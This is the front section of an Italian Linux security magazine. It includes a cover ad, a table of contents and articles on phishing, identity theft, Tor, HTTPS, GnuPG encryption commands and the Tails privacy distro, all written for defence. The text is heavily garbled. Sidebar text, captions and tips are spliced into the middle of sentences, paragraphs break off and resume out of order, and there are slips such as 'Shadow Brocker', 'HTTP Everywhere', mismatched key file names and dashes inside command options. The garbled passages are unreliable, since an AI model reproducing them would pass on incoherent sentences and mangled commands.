PROTEGGITI SUBITO DA OGNI MINACCIA

LINUX SECURITY

Installa TAILS
nel dvd che trovi
all’interno
Navighi in maniera
anonima, cripti file
e chat e non lasci tracce
della tua attività sul PC

SICURO AL

100%
BLINDA IL PC Firewall • antivirus • strumenti antitruffa

PRIVACY
TOTALE
Nasconditi
da spammer,
hacker e dalle
multinazionali

Dì ADDIO
AI PERICOLI
DI WINDOWS
Con Linux sei libero
dai rischi che corri con
il sistema Microsoft.
Installalo subito: è gratis!
PASSWORD BLINDATE DOSSIER HACKER DISCHI PROTETTI

Metti alla prova la forza Così aggrediscono la tua rete Non perdere mai più
delle tue password e impara e mettono fuori uso interi siti i dati con i migliori
a conservarle nel modo più Web: scopri le loro tecniche per sistemi di protezione
efficiente e sicuro imparare a difenderti al meglio dei dischi fissi
 La PRIMA RIVISTA per il mondo
LINUX davvero FACILE

CORRI SUBITO IN EDICOLA!

Acquista la tua copia su www.sprea.it

min_Ubuntu_207x285.indd 1 23/01/17 10:15

 Benvenuti

LA SICUREZZA è LINUX!
Chiunque venga dal mondo prossime 128 pagine vedremo proprio
Windows è abituato a prendere tutti come operano gli hacker, come fare
i giorni misure per evitare di contrarre per evitare di cedere loro dati sensibili
virus, di essere aggredito da pirati e di involontariamente, come proteggere il
mettere nelle mani di malintenzionati i proprio Wi Fi e gli smartphone e molto
propri dati personali. La prima soluzione altro ancora. Buona lettura!
per iniziare a risolvere il
problema è estremamente
semplice: abbandonare
Windows! Il sistema operativo
Microsoft è pieno di falle
e di difetti intrinseci che
lo rendono un obiettivo
davvero troppo facile per
gli hacker. L’alternativa?
Linux, naturalmente. Linux
offre tantissimi diversi
sistemi operativi fra cui
scegliere, ognuno con
caratteristiche particolari
ma tutti estremamente
sicuri. Anche il sistema
operativo più protetto
però non basta: servono
buone abitudini per
evitare di essere
aggrediti da minacce
informatiche. E qui
entra in gioco proprio
Linux Security: nelle

1
 Sommario

Protezione
generale
Proteggere la privacy..........................................................................4
Privacy con Tails.....................................................................................8
Dossier Hacker.................................................................................... 12
Chi protegge i tuoi dati................................................................... 20
Sicurezza: protezione e delizia.................................................. 24
L’attacco all’Internet delle cose................................................ 28
Ecco come ti bucano il Wi Fi...................................................... 34
La distro migliore per blindare il PC...................................... 40
Password blindate............................................................................. 46

Dischi e Dati
ZuluCrypt: Drive cifrati.................................................................... 48
Cancella i dischi prima di venderli.......................................... 50
Protezione totale per i dischi..................................................... 54
RAID: creare e gestire array....................................................... 56
Strumenti perfetti per i backup................................................ 58

2
 Sommario

Sicurezza di rete
Semplificate i vostri firewall........................................................ 64
Controllo totale sulla vostra rete............................................. 68
La distro giusta per i firewall...................................................... 78
Configurare un VPS sicuro.......................................................... 84
Garantire la sicurezza..................................................................... 88

Mobile
Frodi SIP................................................................................................. 92
Android sicuro..................................................................................... 96
Smartphone e privacy col Wi-Fi............................................100

Intrusioni
Desktop a prova di hacker.....................................................................108
Kali Linux...............................................................................................................112
Test di sicurezza..............................................................................................116
Controllare le intrusioni.............................................................................118
Energia: come è verde Linux!..............................................................120
Attenti al firmware........................................................................................124

3
 Protezione Generale

Proteggere la
Privacy
I truffatori muoiono
dalla voglia di mettere
le mani sui vostri dati
personali. Scoprite
come difendervi...

S
e c’è una cosa che i recenti fatti La mole di dati che corre su Internet garantiscono il rimborso del maltolto.
di cronaca hanno insegnato è impressionante e purtroppo c’è molto Certo, ci vuole del tempo e dovrete
è che non ci si può da rubare: password, codici, credenziali compilare una montagna di scartoffie,
assolutamente fidare della Rete. per l’home banking e tanto altro. In questo ma alla fine riavrete quanto è stato
C’è sempre qualcuno in agguato, pronto caso, seppure il danno sia importante rubato. Le implicazioni sono diverse
a spiare e mettere a repentaglio quando parliamo di furto d’identità.
la nostra privacy. Non importa
se si tratta di Stati con la mania
“Il furto d’identità è la In questo caso, qualcuno si
appropria dei vostri account e inizia
della sicurezza, reti pubblicitarie di
monitoraggio o hacker. Il concetto
peggior sciagura che a fare danni incalcolabili: truffa,
offende, mette in giro false accuse,
è sempre lo stesso: i dati personali possa capitarvi in Rete” denigra e tenta di raggirare
sono costantemente nel mirino le persone a voi care.
di qualcuno. Al giorno d’oggi, ognuno e colpisca direttamente le tasche, può Per fortuna potete prendere svariate
di noi ha una propria vita online: profili, essere assorbito. Le banche, infatti, hanno contromisure che andremo a illustrare
credenziali, accessi a siti Web e servizi. tutte speciali polizze assicurative che nelle pagine che seguono.

4
 Lotta ai truffatori

Chi va in cerca di dati?

O
ramai la maggior parte delle persone è cosciente Vedere
comparire una
dell’antico adagio che recita: “Se qualcosa sembra
schermata
troppo bella per essere vera, quasi sicuramente
come questa
c’è dietro una truffa”. Sebbene il fenomeno del phishing può essere
abbia attecchito promettendo facili guadagni, adesso un duro colpo
ha cambiato radicalmente modalità operative. per chiunque.
Dietro alle false email che riceviamo quotidianamente, Ponete
ci sono esperti di ingegneria sociale. Questa branca della massima
scienza si occupa di stabilire e studiare le reazioni umane attenzione
a determinati stimoli, al fine di rubare informazioni a dove fate
preziose. Il phishing, quindi, è diventato uno dei maggiori click
rischi per la sicurezza online.

Crediti: Bromium Labs

I criminali che si avvalgono di questa tecnica hanno
a disposizione una grande quantità di strumenti. Uno dei più
comuni attacchi consiste nell’inviare un’email con un finto
brand, di solito ripreso da quello di una banca famosa.
Potreste rimanere stupiti da quanto sia facile copiare stili,
formulazione, formattazione e indirizzi email di istituti bancari
o poste. Molto banalmente, basta registrare un dominio simile si aggrappano per rubare la vostra identità è enorme.
a quello che si vuole utilizzare per prendere di mira gli utenti. Se vi inquadrano nel mirino, analizzano perfino le eventuali
Per esempio, è sufficiente sostituire la O con lo 0 (zero) o .it recensioni su Amazon che avete lasciato. Da lì si possono
con .co. Il testo dell’email, di solito, fa riferimento a una verifica desumere interessi, acquisti e molti altri particolari
potenzialmente interessanti. Il tutto per
“L’ingegneria sociale ha lo scopo un unico scopo: spacciarsi per voi di fronte
ai servizi che usate. Convincendo i sistemi
di studiare le reazioni umane di sicurezza automatizzati per la verifica

al fine di carpire informazioni” dell’identità, gli hacker possono richiedere

di sicurezza, in cui viene richiesto di confermare i propri dati
d’accesso su un sito fasullo. Non appena inseriamo
le credenziali nella finta interfaccia, la trappola si chiude.
Una variante di questi attacchi consiste nello Spear Phishing.
Si tratta di un sistema molto più diretto e pericoloso. Anziché
sparare nel mucchio come nella tecnica sopra illustrata,
il criminale scende nel dettaglio. Assume l’identità di un
funzionario di un’Ente, quindi vi contatta con una qualsiasi
scusa. Lo scopo è sempre lo stesso: carpire informazioni
personali e codici di accesso. Il modo in cui riesce
a impossessarsi delle informazioni circa la persona per cui
si spaccia è molto semplice. Spesso è sufficiente una veloce
ricerca su Google. Quasi tutte le banche o gli uffici pubblici
hanno una lista dei propri capi area, con tanto di curriculum
in bella vista. La quantità di informazioni a cui i malviventi
la reimpostazione delle password,
la modifica dell’indirizzo email e molto altro
ancora. Un ulteriore aspetto da tenere presente è la quantità
di informazioni personali che date in pasto gratuitamente
ai Social Network. Per conoscere vita, morte e miracoli di una
persona, il più delle volte basta dare un’occhiata al profilo
Facebook. Ci sono più dati al suo interno che in qualsiasi altro
posto. Per non parlare poi di Google. Date un’occhiata
a https://myaccount.google.com e controllate la sezione
Gestisci le tue attività su Google. Procedete in Vai alle mie
attività e fatevi quattro risate. Ci sono i riferimenti di tutte
le ricerche che avete effettuato sul motore di ricerca, i video
di YouTube che avete visto, le indicazioni e perfino i frammenti
audio utilizzati con il famoso Ok Google. Viene tutto archiviato
minuziosamente, così da “migliorare la vostra esperienza
Web”. In altre parole, il concetto di gratuito non esiste.
Si paga tutto e nel XXI secolo lo si fa con i dati personali.

Ombre ed equazioni
Recentemente è stata messa in vendita una
raccolta di strumenti molto potenti per l’hacking
ed exploit di vario tipo. Per stuzzicare l’appetito
dei potenziali acquirenti, il venditore ha messo
a disposizione un campione gratuito. Per il resto,
veniva chiesta la bellezza di 1 milione di dollari
in bitcoin. Il gruppo dietro la vendita, chiamato
Shadow Brocker, sostiene di aver rubato queste
armi informatiche a un altro team di hacker
conosciuto con il nome di Equation Group.
Quest’ultimo sembra sia strettamente legato alla
NSA, per cui pare esegua operazioni di vario tipo.
Equation ha convalidato la violazione dei propri
sistemi che hanno portato gli Shadow Brocker
a carpire il materiale poi messo in vendita. Alcuni
strumenti di questo arsenale consistono in una
serie di attacchi che sfruttano molte vulnerabilità
dei dispositivi di rete più utilizzati. Cisco
e Fortinet hanno quindi rilasciato
immediatamente diverse patch di emergenza.
Questo fa pensare che i programmi per l’hacking
rubati contenessero diversi exploit “zero-day”,
vale a dire componenti che sfruttano
vulnerabilità sconosciute perfino ai produttori.

5
 Protezione Generale

Come nascondersi
O
ltre al furto delle credenziali bancarie e della
propria identità, molte persone sono preoccupate
per il crescente dilagare delle intercettazioni.
Indipendentemente che non si abbia niente da nascondere,
la prudenza non è mai troppa. Quando parliamo di celarsi,
non vogliamo in alcun modo giustificare o avvalorare
la criminalità o le attività illegali. Internet è uno strumento.
Sta a noi utilizzarlo nel modo giusto. Gli illeciti devono
essere condannati senza alcun dubbio. Nascondersi
tra le pieghe della Rete o rendere illeggibili le proprie
comunicazioni è comunque un diritto che ognuno di noi
può sfruttare. Si chiama riservatezza. Quello che facciamo
in questo contesto, però, deve essere sempre e nel modo
più assoluto rispettoso della legalità.
Il primo baluardo a difesa della privacy è la crittografia a chiave
pubblica. Permette a due persone che non si sono mai
incontrate di comunicare in tutta sicurezza e senza bisogno
di concordare una chiave privata in anticipo. La matematica
dietro questo standard risale agli anni ‘70, ma la sua
applicazione si è diffusa su larga scala solo in quest’ultimo
HTTP Everywhere permette di sfruttare HTTPS automaticamente dove
possibile. Lo scaricate come estensione per Firefox, Chrome e Opera
periodo. Gli strumenti per attuare la crittografia alle email
ci sono e non hanno certo curve di apprendimento ripide
da screditarne l’utilizzo. Tuttavia, molte persone li ignorano
per pigrizia o ignoranza. Da questo punto di vista, l’approccio
di HTTPS è molto più immediato e non richiede alcuna attività
specifica. Questo protocollo, vale a dire HyperText Transfer
Protocol over Secure Socket Layer permette di comunicare
privatamente con un sito Web. Sviluppato intorno agli anni ‘90,
svolge due funzioni: autenticazione e segretezza. Garantisce
che le pagine visitate corrispondano effettivamente a quelle
corrette e cripta la trasmissione dati da e verso il sito
in questione. Tuttavia anche questo sistema è lungi dall’essere
perfetto, in quanto basa tutto il suo funzionamento
sull’implicita fiducia riposta nelle Autorità di Certificazione.
Purtroppo, l’elenco di CA (Certification Authority) canaglia
è piuttosto lungo. Non solo, ma considerando gli attacchi
apportati ai protocolli sottostanti, la situazione è tutt’altro
che tranquilla. Comunque questo è ciò che abbiamo
ed è meglio di niente. Prima di collegarsi ai siti in cui vengono
scambiate credenziali, è opportuno controllare sempre che
nella barra degli indirizzi sia presente l’estensione HTTPS.
Se abbiamo una pagina Web e vogliamo dotarla di un
certificato per la navigazione sicura, possiamo rivolgerci
a LetsEncrypt (https://letsencrypt.org). Questo sistema,
oltre a essere sicuro, è facile da utilizzare e si rivela
un’ottima risorsa per migliorare l’affidabilità del proprio sito.
La rete Tor è un altro argomento che merita di essere
approfondito. Principalmente conosciuta per la possibilità
di navigare anonimamente, il suo utilizzo ha fatto scalpore
per essere l’unico sistema di accesso al Dark Web. Tor nasce
come progetto del Dipartimento della Difesa statunitense
e, contrariamente a quello che si pensa, gran parte dei suoi
finanziamenti proviene ancora da svariate fonti governative.
Il progetto Tor è tuttavia gestito in modo indipendente
e secondo i principi Open Source. I governi, pertanto,
non hanno accesso al codice di base. L’interesse pubblico
a disabilitare questa Rete è però ad alti livelli. Alcuni
ricercatori della Carnegie Mellon University sono riusciti
a de-anonimizzare una parte di Tor, consegnando i risultati
all’FBI. I frutti di questa operazione sono maturati poco dopo,
quando c’è stata un’azione capillare e coordinata contro
diversi operatori attivi nella Dark Net.

Crittografia End-to-End
Quest’anno, WhatsApp ha implementato
la crittografia End-to-End per tutti i propri
utenti. La chiave necessaria a decifrare
i messaggi che passano attraverso la rete
dell’applicazione è condivisa solo tra
il mittente e il destinatario delle
comunicazioni. La tecnologia è identica
a quella usata da Open Whisper System
in Signal, il client di messaggistica orientato
alla massima tutela della privacy.
Il programma è stato progettato da Moxie
Marlinspike, noto attivista e hacker a difesa
della riservatezza. Lo stesso protocollo sarà
esteso a breve anche su Facebook
Messenger. Questo, tuttavia, comporterà
la disponibilità dei messaggi su un solo
dispositivo. In caso contrario, ci potrebbero
essere problemi nella distribuzione delle
chiavi. Visto che tale crittografia trova
sempre più sbocchi applicativi, i cracker
si concentreranno sul prendere possesso
degli apparecchi con cui si comunica, vale
a dire smartphone, tablet e PC. Il precario
stato di sicurezza dimostrato da Android,
per lo più causato dall’inettitudine dei
vettori di aggiornamento, fornisce uno
dei maggiori punti deboli che i criminali
possono sfruttare a loro piacimento. Fate
quindi molta attenzione e tenete gli occhi
aperti. I pericoli sono dietro l’angolo.

6
 Lotta ai truffatori

Una vita migliore con GPG

I
n Linux, il coltellino svizzero della crittografia è Gnu
Privacy Guard (GnuPG) Suite di Werner Koch. La sua
applicazione principale (gpg) ricorda da vicino Pretty
Good Privacy (PGP), uno strumento originariamente
sviluppato nel 1991 da Phil Zimmerman. Al giorno d’oggi,
OpenPGP è uno standard che specifica come criptare
i messaggi e i bit a essi associati. GnuPG, invece, si occupa
di implementare questa tecnologia. Il software funziona
da riga di comando e ha la reputazione di essere piuttosto
complesso (date un’occhiata a https://moxie.org/blog/gpg-
and-me). Permette di sfruttare tutti i più moderni algoritmi
a chiave pubblica e privata. Di conseguenza, c’è un gran
numero di opzioni configurabili. La pagina man è una
soluzione obbligatoria. La maggior parte delle distro
consente di installare GnuPG dai propri gestori software.
Non dovrete fare alcuno sforzo per montarlo nel sistema. Se la riga
La tradizionale crittografia simmetrica, vale a dire quando passphrase per proteggere la chiave. Generare una credenziale di comando
le due controparti di una conversazione condividono un’unica di questo genere richiede l’uso dell’entropia (dati casuali). di GPG è troppo
password segreta, funziona bene solo quando si può sfruttare Durante il procedimento dovrete premere i tasti della tastiera scoraggiante,
un canale sicuro per comunicare la chiave. In genere, e muovere il mouse ripetutamente. Una volta fatto, controllate provate
ciò comporta un incontro di persona che tuttavia non sempre che tutto sia filato liscio con gpg --list-keys. GnuPG protegge la controparte
grafica GPA.
è possibile. La crittografia asimmetrica ha il vantaggio tutte le chiavi generate all’interno di una cassaforte. Potete
Se invece avete
esportare il contenuto di questo bunker virtuale
“La chiave privata dovrebbe in qualsiasi momento. Fate molta attenzione! Ricordate
che al suo interno ci sono anche le chiavi private.
KDE/Plasma,
puntate

rimanere sempre in un posto Per condividere la public key, usate l’istruzione:

su KGPG

sicuro e controllato” $ gpg --output lxfpublic.key --armor –export <user id>

di escludere questo punto debole. Il sistema si basa sulla
creazione di due chiavi: pubblica e privata. Iniziate generando
le basi con $ gpg –full-gen-key. Per i primi tre passaggi, accettate
le impostazioni predefinite. Questo comando crea una chiave
RSA a 2.048 bit, con una sottochiave RSA che non ha scadenza.
Nel passo successivo, inserite nome e indirizzo email. Queste
informazioni verranno memorizzate nella chiave pubblica
che, come si evince dal nome, deve essere il più possibile resa
nota. A tal proposito, consigliamo di non utilizzare il vero nome
di battesimo o l’indirizzo di posta principale (a meno che non
si vogliano rendere pubblici). Il riferimento email che indicate qui,
può non avere niente a che fare con quello utilizzato per inviare
e ricevere i messaggi. A questo punto dovrete aggiungere una
Modificate <user id> con l’email utilizzata durante
il processo di creazione delle chiavi. Il risultato
può essere inviato ai vostri collaboratori che possono importarlo
con il seguente comando:
$ gpg --import lxppublic.key
In alternativa, caricate la chiave pubblica in un server, in modo
che sia reperibile da chiunque. Per recapitare un messaggio
crittografato, fate consultare ai vostri contatti il file istruzioni.txt
che generate in questo modo:
$ gpg --recipient <user id> --encrypt istruzioni.txt
quindi inviate istruzioni.txt.gpg. Quando il collega riceve
il documento, dovrebbe eliminarlo in modo sicuro con la
funzione shred. Se preferite un’interfaccia grafica e un approccio
più semplificato, c’è sempre il front-end GPA (Gnu Privacy
Assistant) e l’ottimo plug-in Enigmail per Thunderbird.

Rete di Fiducia e Key Signing Party

Se avete la chiave pubblica di qualcuno, solo
il titolare della corrispondente chiave privata sarà
in grado di leggere i messaggi cifrati che gli
indirizzate. C’è però un problema: a meno che
non vi siate scambiati le credenziali di persona,
non avete alcuna garanzia che assicura la reale
proprietà della public key. In altre parole,
potrebbe essere di un impostore. Il modo
migliore per tranquillizzare chi usa la vostra
chiave pubblica, è fare in modo che sia condivisa
il più possibile. Caricatela su più server, mettetela
nella firma in calce alle email, inseritela nei
riferimenti di contatto sul sito Web che avete
creato. Allo stesso modo, quando utilizzate
la public key di qualsiasi persona che non
conoscete, fate sempre un controllo. Il modo
migliore è incontrarsi. Se non è possibile perché
magari il vostro interlocutore sta dall’altra parte
del mondo, chiedetegli di confermare la sua
identità. Così facendo si genera una Rete
di Fiducia. Nel corso del tempo, le persone
che hanno interesse a contattarvi sapranno
di potersi fidare, perché avranno una
corrispondenza diretta tra voi e la public key che
usate. Tra le strategie più in voga nel mondo della
crittografia a chiave pubblica ci sono i Key
Signing Party, dove, tra una baldoria e l’altra,
ci si scambiano le credenziali. Per saperne di più,
date un’occhiata a www.gnupg.org/howtos/
it/keysigning_party.html.

7
 Protezione Generale
Privacy con Tails
Esplorate con noi le ultime novità di Tails, la distro
che permette di mantenere l’anonimato online
I
partecipanti a Eurocrypt 2016 hanno avuto una
grande fortuna. Durante la convention, è stata fornita
una chiave USB con una versione Live di Tails.
È dal 1987 che la conferenza si occupa di promuovere
la protezione e riservatezza dei dati personali tramite
la crittografia e le tecniche di anonimizzazione.
Tails, in questo contesto, è sempre stato presente.
Da quest’anno, gli organizzatori hanno messo una clausola:
Tip tutti i partecipanti devono avere una copia della distro.
Chi non ha mai sentito parlare di questo sistema, leggendo
Non riuscite le pagine che seguono, può farsi un’idea abbastanza
a connettervi a precisa di quali sono le sue potenzialità, Volendo descrivere
Internet con Tails?
Il vostro
Tails in poche parole, potremmo definirlo come una
ISP potrebbe
piattaforma creata con un solo obiettivo: mantenere
aver bloccato l’anonimato e la sicurezza ad alti livelli. Il risultato è un
la connessione sistema che vanta una suite di programmi accuratamente
alla rete Tor. selezionati, che direzionano tutto il traffico Internet
Riavviate
attraverso la rete Tor. All’atto pratico significa garantirsi
il sistema
e scegliete un maggiore anonimato, pagando il prezzo di una velocità
Sì in Opzioni di navigazione più lenta. Utilizzato da personaggi
aggiuntive. del calibro di Edward Snowden, Tails è un ambiente
Nella sezione totalmente incentrato sulla privacy. Tuttavia, come ogni
Configurazione
di rete, puntate su
cosa che ci circonda, ha vantaggi e svantaggi. Gli amanti
La connessione di Linux sanno che la maggior parte delle distro può essere
a Internet di avviata in modalità Live, quindi senza installare alcunché
questo computer nel disco fisso. Basta limitarsi a sfruttare una pendrive
è bloccata da
o un DVD. Questo approccio ha due punti favorevoli:
censura, filtrata
o utilizza un permette di provare un sistema senza alterare
proxy. la configurazione dell’hard disk e non lascia alcuna traccia
nel PC, una volta rimosso il supporto che ospita la distro.
Amato e odiato, Snowden è un uomo difficile da trovare, in parte grazie a Tails
8
Tails sfrutta Tor Browser 6.0.3 e sì, quella che vedete
in questa schermata è una cipolla...
Una sola missione: l’anonimato
Quando si parla di privacy, di solito ci sono due tipi
di reazioni, ognuna agli antipodi dell’altra. La prima
è tipica dei fatalisti che rinnegano a priori la possibilità
di mantenere un buon livello di riservatezza online.
Il loro unico sistema per mettere i dati al sicuro consiste
nel sotterrarli in una caverna, quanto più possibile
lontano da una connessione a Internet. La seconda
reazione è quella dei menefreghisti che, convinti di non
aver nulla da nascondere, ritengono la protezione una
paranoia inutile. A tali persone ci piacerebbe chiedere
se vogliono regalare i propri numeri di carta di credito
o se preferiscono andare in giro nudi con i loro segreti
tatuati sulla pelle. Per coloro che stanno in mezzo
a questi due antipodi, le nuove funzioni di Tails sono più
che sufficienti per dormire sonni relativamente tranquilli.
In primo luogo, la distro è diventata molto più semplice
da scaricare in base al sistema che state utilizzando.
Visitando il sito ufficiale (https://tails.boum.org),
vi renderete conto di come la grafica sia stata rivista
per favorire un approccio molto più funzionale.
Gli sviluppatori di Tails, inoltre, hanno chiuso il proprio
canale IRC a favore di una chat XMPP. Potete accedervi
con Pidgin, il programma di Instant Messaging incluso
nella distro. Come nelle release precedenti, Pidgin sfrutta
OTR (Off The Record), una particolare funzione che
cripta i messaggi prim’ancora dell’invio. Il software
Vidalia, oramai goffo e obsoleto, è stato sostituito con
una semplice icona che indica l’operatività della rete Tor.
In seguito a una falla nella sicurezza di Claws Mail,
il client di posta elettronica predefinito è stato rilevato
da Icedove, dove trovate fin da subito il famoso plug-in
Enigmail. Questa estensione utilizza un server sicuro
HKPS OpenPGP. In più, consente di creare una coppia
di chiavi per la crittografia asimmetrica in modo semplice
e veloce. Icedove, inoltre, è dotato di un assistente per
la configurazione automatica degli indirizzi email.

Se usate un provider di posta comune, basta inserire
i principali riferimenti per impostare al volo il servizio
all’interno del programma. Dando un’occhiata sotto
al cofano di Tails, scoprirete che firewall e kernel sono
stati potenziati e resi inattaccabili da alcune vulnerabilità
rilevate nelle versioni 2.3 e 2.4. Tor Browser è stato
aggiornato alla release 6.05, che si basa su Firefox 45.3.
Incluse, troviamo le estensioni Adblock Plus e HTTPS
Everywhere. Il primo evita le fastidiose pubblicità sparse
per i siti Web. Il secondo, invece, abilita automaticamente
SSL dove possibile. Da febbraio 2016, Tails 2.x è basato
su Debian 8 (Jessie), con ambiente desktop Gnome
Classic Shell. Il sistema, rispetto alle distro tradizionali,
richiede qualche minuto in più per essere installato
nel disco rigido. Tuttavia, una volta completato
il processo, anche il computer più spartano sarà
in grado di utilizzare al meglio la piattaforma. Tails non
è raccomandato per l’uso quotidiano, ma è bello rilevare
gli sforzi fatti per renderlo più pratico possibile.
Il supporto per la riproduzione dei DVD protetti da DRM
è incluso. Gli appassionati di contenuti multimediali
saranno felici degli aggiornamenti di Audacity, Traverso
e Sound Juicer. Se avete bisogno di un editor video,
potete sfruttare Pitivi, il software incluso in Ubuntu fino
a ottobre 2011. Questa nuova versione di Tails è completa
di LibreOffice. Seppure non sia la release più recente
basata su Debian, svolge ugualmente un lavoro
eccezionale. Tecnicamente è possibile aggiungere
programmi o aggiornare manualmente quelli presenti
tramite il Terminale. Così facendo, però, potreste
incrinare l’azione di anonimato svolta dalla distro.
Anonimato online
a cui è soggetto Tor. Il punto debole di questa rete, infatti,
è causato dagli ingressi e dalle uscite dei nodi.
Se un’organizzazione governativa o qualsiasi team
Tip
foraggiato con fondi pubblici tiene sotto controllo gli
Se scaricate
accessi, potrebbero rintracciarvi. Il problema può essere Tails con Firefox
mitigato se visitate siti Web con URL radicati, versione 38+/
ma non è comunque un modo per ritenervi al sicuro. Tor Browser 5+,
potrete sfruttare
Nelle versioni precedenti di Tails, potevate mascherare
un nuovo add-on
l’interfaccia grafica della distro perché assomigliasse che permette di
a Windows, così da non attirare l’attenzione di chi verificare se state
vi stava intorno. Questa funzione, tuttavia, è stata prelevando una
momentaneamente disabilitata in attesa di un copia originale
di Tails. Date
aggiornamento. Tails è un progetto Open Source e come
un’occhiata
tale aperto a molti programmatori esperti che possono a https://tails.
rivedere regolarmente il codice in cerca di bug boum.org
o backdoor. Nonostante ciò, se siete vittima di un DNS
poisoning, le funzioni di sicurezza integrate non saranno
di alcun aiuto. Questo attacco, comunemente tradotto
con “avvelenamento dei DNS”, comporta
il reindirizzamento della connessione verso siti
fraudolenti. È quindi molto importante sfruttare
la funzione di verifica dell’hash della ISO, così
da scongiurare la possibilità di incappare in una copia
corrotta del sistema operativo. Il progetto Tails, inoltre,
non fornisce alcuna protezione contro gli attacchi che
colpiscono l’hardware. Un esempio può essere il classico
Keylogger che registra tutto ciò che scrivete. Per ridurre

Il colpo di coda
Le applicazioni preinstallate non copiano alcun dato
nel disco fisso. Viene tutto eliminato automaticamente
al successivo riavvio di sistema. Tails, comunque, non
è immune da problemi. Il sito Web del progetto fornisce
una panoramica piuttosto realistica sugli attacchi a cui La tastiera virtuale Florence permette di non essere preda dei keylogger.
la distro è vulnerabile, che peraltro sono gli stessi Può essere configurata con colori diversi

Persistenza sì o no
Quando parliamo di persistenza,
intendiamo la possibilità di salvare
i propri dati in un supporto di memoria
all’interno di Tails
Se volete usare la persistenza, pur coscienti
dei rischi che correte, Tails permette
di configurare questa funzione in modo
semplice e veloce. Andate in Applicazioni D
Tails Configure Persistent Volume.
Naturalmente, questa opzione funziona solo
se Tails è installato in un chiavetta USB.
Una volta definita una passphrase, fate click
su Create e attendete che il volume sia
pronto. Di seguito, sfruttate una serie
di opzioni che consentono di scegliere cosa
conservare. Le più comuni prevedono GnuPG
(memorizza tutte le chiavi OpenPGP), chiavi
SSH (pubbliche e private), impostazioni
di Pidgin (account, chat, password di OTR,
ecc),la configurazione di Icedove e degli
indirizzi di posta elettronica, Gnome Keyring
e molto altro ancora. Infine, create una
cartella chiamata Persistent che conserva
tutti i documenti salvati o scaricati. Da notare
che il gestore password KeePassX, per
impostazione predefinita, non memorizza
il proprio database in questa directory. Usate
la funzione Salva con nome per sistemare
l’archivio al suo interno. Il salvataggio dei dati
da parte di una delle applicazioni
precedentemente selezionate può essere
interrotto in qualsiasi momento. I file che
sono già stati archiviati rimarranno
comunque all’interno di Persistent. Per
eliminarli, dovrete procedere manualmente.
Una volta fatto, basta spegnere il PC
e riavviarlo con la chiavetta di Tails inserita
nella porta USB.

9
 Protezione Generale
i rischi, in genere è sufficiente utilizzare la tastiera virtuale
integrata. Per attivarla, basta fare click sull’icona nella
parte superiore destra. Per chi invece preferisce utilizzare
Tails in modalità persistente, è importante sottolineare
che la distro non elimina i metadati dei file come il nome
dell’autore di un documento. Per fortuna, preinstallato nel
sistema, troviamo MAT (Metadata Anonymisation Toolkit)
che consente di rimuovere qualsiasi dato supplementare
all’interno di un file. Infine, vogliamo citare una frase che
compare nel sito Web del progetto: “Tails non rende più
robuste le password deboli”. Una chiave di accesso
semplice può essere scoperta in pochi minuti con un
attacco brute force. Da questo punto di vista, Tails vi aiuta
persistente, così da rendere le monete
spendibili. In alternativa, niente vieta
di usare il sistema Live e scrivere
nel portafogli una catena di parole
che consentirà di recuperare il
denaro virtuale.
Applicazioni isolate
Nel momento in cui c’è stato il passaggio
a Debian, il team di Tails si è concentrato nell’isolare
le applicazioni che utilizzano AppArmor. Ciò è possibile
grazie alla riga di comando del Kernel. Per esempio.
Pidgin Messenger non può accedere al portachiavi di

Tip con PWGen che consente la creazione di password molto

sicure. Quest’applicazione, in realtà, è solo una costola
GnuPG. Questa funzione deve essere considerata come
un work in progress. Le potenzialità ci sono tutte, ma la
di ciò che fornisce KeePassX. La proverbiale cassaforte strada per la perfetta integrazione è ancora lunga. Un
Diceware,
http://bit.ly/ per le credenziali offre un altrettanto lodevole generatore altro aspetto molto importante consiste nel valutare la
Diceware di chiavi, capace di sfruttare l’entropia derivata dal possibilità che la chiavetta con Tails venga rubata. Il
PassPhrase, movimento casuale del mouse. Chi preferisce fare volume Persistent LUKS è crittografato per
oltre che fornire a meno della persistenza, potrebbe scrivere le proprie impostazione predefinita, ma tutti i documenti salvati al
assistenza per la
password con Diceware (http://bit.ly/ di fuori sono visibili. Se decidete di andare sotto
creazione di una
passphrase, può DicewarePassPhrase). Tails, inoltre, mette a disposizione copertura in Corea del Nord e con Tails salvate il vostro
essere utilizzato Paperkey, uno strumento a riga di comando capace rapporto in un’altra pendrive, tenete presente che il
per generare di eseguire il backup delle chiavi OpenGP su carta. contenuto non verrà crittografato. Tails Utility Disc
username casuali
Se, come tante persone, avete da parte qualche bitcoin blinda un dispositivo esterno, ma solo dopo avervi
(due o tre parole
legate insieme). e volete metterlo al sicuro, potete puntare su Electrum copiato i dati. Purtroppo viviamo in un mondo dove chi
Bitcoin Wallet. Il client può essere abilitato in modalità cerca di nascondere la propria presenza è considerato
un potenziale criminale o comunque qualcuno che ha
scheletri nell’armadio. Se visitate paesi con regimi
totalitari, fate attenzione alla pendrive con Tails
installato. La distro, infatti, non fa niente per nascondere
la sua presenza e, se scoperta, potrebbe causarvi qualche
Se varcate grana. La soluzione migliore, anche se non certo comoda,
le frontiere consiste nel visitare il sito di Tails, quindi installare la distro
di alcuni Stati,
sul pulito ogni volta che ne avete bisogno. Prendetevi tutto
fate attenzione
il tempo per esplorare il sistema operativo e le sue
alla vostra
chiavetta funzioni, valutando anche le vulnerabilità elencate nelle
con Tails. pagine ufficiali. Se trovate applicazioni che non soddisfano
Potrebbero in pieno i vostri bisogni, fate un salto su https://tails.
sequestrarla boum.org e lasciate un feedback.

Generate le chiavi pubblica e privata con Icedove

Assicuratevi di lanciare Icedove solo
quando Tor è operativo. Se siete fanatici
della privacy, create un nuovo indirizzo
di posta elettronica da usare solo con Tails.
Potete sfruttare uno dei provider più
utilizzati come Gmail. Al resto pensa tutto
Icedove. Se invece volete mantenere
il vostro flusso di email all’interno della
rete Tor, assicuratevi che i vostri contatti
utilizzino un indirizzo email sicuro con
Mail2Tor, Riseup e OnionMail. Basta fare
click su Configurazione manuale
e immettere le credenziali dei server
in questione. Una volta impostato tutto,
selezionate Enigmail dal menu di Icedove,
quindi procedete con l’installazione
guidata. Se sapete già dove mettere
le mani, usate la modalità per esperti,
così da avere il massimo controllo sulla
procedura di creazione delle chiavi privata
e pubblica. Successivamente verrà chiesto
di scegliere una passphrase per la key
GPG. Le dimensioni e la complessità
contano, quindi assicuratevi di impostarne
uno robusta e a prova di attacchi brute
force. A questo punto siete in grado
di generare un certificato di revoca per
le chiavi, da usare nell’eventualità perdiate
o vogliate modificare la passphrase.
Naturalmente deve essere salvato nella Per creare le chiavi, potrebbero essere
cartella Persistent o in qualsiasi altro necessari svariati minuti. Il processo, infatti,
